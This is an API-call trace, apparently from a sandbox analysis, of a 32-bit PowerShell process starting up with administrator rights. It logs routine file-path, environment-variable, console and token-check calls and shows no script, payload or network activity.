	[0123.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xce8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0123.083] GetLastError () returned 0x2
	[0123.083] SetErrorMode (uMode=0x1) returned 0x1
	[0123.083] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xced74 | out: lpFileInformation=0xced74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0123.083] GetLastError () returned 0x2
	[0123.084] SetErrorMode (uMode=0x1) returned 0x1
	[0125.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce988, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0125.684] GetLastError () returned 0x0
	[0125.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0125.684] GetLastError () returned 0x0
	[0125.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0125.685] GetLastError () returned 0x0
	[0125.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.688] GetLastError () returned 0xcb
	[0125.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.692] GetLastError () returned 0xcb
	[0125.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.692] GetLastError () returned 0xcb
	[0125.833] CoCreateGuid (in: pguid=0xcee54 | out: pguid=0xcee54*(Data1=0x47585589, Data2=0xddba, Data3=0x4224, Data4=([0]=0xb6, [1]=0x96, [2]=0xc, [3]=0xa2, [4]=0xc2, [5]=0x8e, [6]=0xa9, [7]=0xdb))) returned 0x0
	[0126.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0126.013] GetLastError () returned 0xcb
	[0126.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0126.017] GetLastError () returned 0xcb
	[0126.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0126.020] GetLastError () returned 0xcb
	[0126.694] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0126.695] GetLastError () returned 0x0
	[0126.697] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xced34 | out: lpConsoleScreenBufferInfo=0xced34) returned 1
	[0126.697] GetLastError () returned 0x0
	[0126.702] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0126.703] GetLastError () returned 0x0
	[0126.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xced34 | out: lpConsoleScreenBufferInfo=0xced34) returned 1
	[0126.703] GetLastError () returned 0x0
	[0126.704] GetVersionExW (in: lpVersionInformation=0x337c60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x337c60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.704] GetLastError () returned 0x0
	[0126.706] GetCurrentProcess () returned 0xffffffff
	[0126.706] GetLastError () returned 0x3f0
	[0126.708] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xced44 | out: TokenHandle=0xced44*=0x344) returned 1
	[0126.708] GetLastError () returned 0x3f0
	[0126.895] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xced9c | out: TokenInformation=0x0, ReturnLength=0xced9c) returned 0
	[0126.895] GetLastError () returned 0x7a
	[0126.897] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x348730
	[0126.897] GetLastError () returned 0x7a
	[0126.897] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x348730, TokenInformationLength=0x4, ReturnLength=0xced9c | out: TokenInformation=0x348730, ReturnLength=0xced9c) returned 1
	[0126.898] GetLastError () returned 0x7a
	[0126.900] DuplicateTokenEx (in: hExistingToken=0x344, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xced54 | out: phNewToken=0xced54*=0x33c) returned 1
	[0126.900] GetLastError () returned 0x7f
	[0126.900] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xced9c | out: TokenInformation=0x0, ReturnLength=0xced9c) returned 0
	[0126.901] GetLastError () returned 0x7a
	[0126.901] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x348710
	[0126.901] GetLastError () returned 0x7a
	[0126.901] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x8, TokenInformation=0x348710, TokenInformationLength=0x4, ReturnLength=0xced9c | out: TokenInformation=0x348710, ReturnLength=0xced9c) returned 1
	[0126.901] GetLastError () returned 0x7a
	[0126.902] CheckTokenMembership (in: TokenHandle=0x33c, SidToCheck=0x2b1aedc*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xced30 | out: IsMember=0xced30) returned 1
	[0126.902] GetLastError () returned 0x7a
	[0126.902] CloseHandle (hObject=0x33c) returned 1
	[0126.902] GetLastError () returned 0x7a
	[0126.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0126.902] GetLastError () returned 0x7a
	[0126.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0126.903] GetLastError () returned 0x7a
	[0126.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0126.903] GetLastError () returned 0x7a
	[0126.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0126.903] GetLastError () returned 0x7a
	[0127.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce844, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.169] GetLastError () returned 0x7a
	[0127.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.169] GetLastError () returned 0x7a
	[0127.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0127.169] GetLastError () returned 0x7a
	[0128.564] GetConsoleTitleW (in: lpConsoleTitle=0x338408, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0128.565] GetLastError () returned 0x7a
	[0129.311] GetConsoleTitleW (in: lpConsoleTitle=0x338408, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0129.311] GetLastError () returned 0x7a
	[0129.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce83c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.311] GetLastError () returned 0x7a
	[0129.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce7ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.312] GetLastError () returned 0x7a
	[0129.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce7ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.312] GetLastError () returned 0x7a
	[0129.317] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0129.317] GetLastError () returned 0x7a
	[0129.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.318] GetLastError () returned 0x7a
	[0129.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.318] GetLastError () returned 0x7a
	[0129.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.318] GetLastError () returned 0x7a
	[0129.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.318] GetLastError () returned 0x7a
	[0129.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.630] GetLastError () returned 0x7a
	[0129.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.631] GetLastError () returned 0x7a
	[0129.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.631] GetLastError () returned 0x7a
	[0129.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.631] GetLastError () returned 0x7a
	[0129.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.631] GetLastError () returned 0x7a
	[0129.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.631] GetLastError () returned 0x7a
	[0129.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce888, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.632] GetLastError () returned 0x7a
	[0129.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce838, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.632] GetLastError () returned 0x7a
	[0129.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce838, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.632] GetLastError () returned 0x7a
	[0129.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce838, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.632] GetLastError () returned 0x7a
	[0130.528] SetConsoleCtrlHandler (HandlerRoutine=0x2a3384a, Add=1) returned 1
	[0130.528] GetLastError () returned 0x7a
	[0131.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.510] GetLastError () returned 0xcb
	[0132.073] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0132.073] GetLastError () returned 0x0
	[0132.213] CoCreateGuid (in: pguid=0xced68 | out: pguid=0xced68*(Data1=0xa3a63753, Data2=0xaf1e, Data3=0x4336, Data4=([0]=0xb6, [1]=0x79, [2]=0x8f, [3]=0xb9, [4]=0x52, [5]=0xcb, [6]=0xa8, [7]=0x23))) returned 0x0
	[0134.699] WinSqmIsOptedIn () returned 0x0
	[0134.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.701] GetLastError () returned 0xcb
	[0134.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.883] GetLastError () returned 0xcb
	[0134.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.884] GetLastError () returned 0xcb
	[0134.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.887] GetLastError () returned 0xcb
	[0134.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.889] GetLastError () returned 0xcb
	[0134.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.907] GetLastError () returned 0xcb
	[0134.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.908] GetLastError () returned 0xcb
	[0135.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.081] GetLastError () returned 0xcb
	[0135.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.093] GetLastError () returned 0xcb
	[0135.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.455] GetLastError () returned 0xcb
	[0135.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.458] GetLastError () returned 0xcb
	[0135.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.459] GetLastError () returned 0xcb
	[0145.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.305] GetLastError () returned 0xcb
	[0145.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.305] GetLastError () returned 0xcb
	[0145.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.305] GetLastError () returned 0xcb
	[0145.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.305] GetLastError () returned 0xcb
	[0146.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.007] GetLastError () returned 0x3
	[0146.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.007] GetLastError () returned 0x3
	[0146.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.007] GetLastError () returned 0x3
	[0146.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.008] GetLastError () returned 0x3
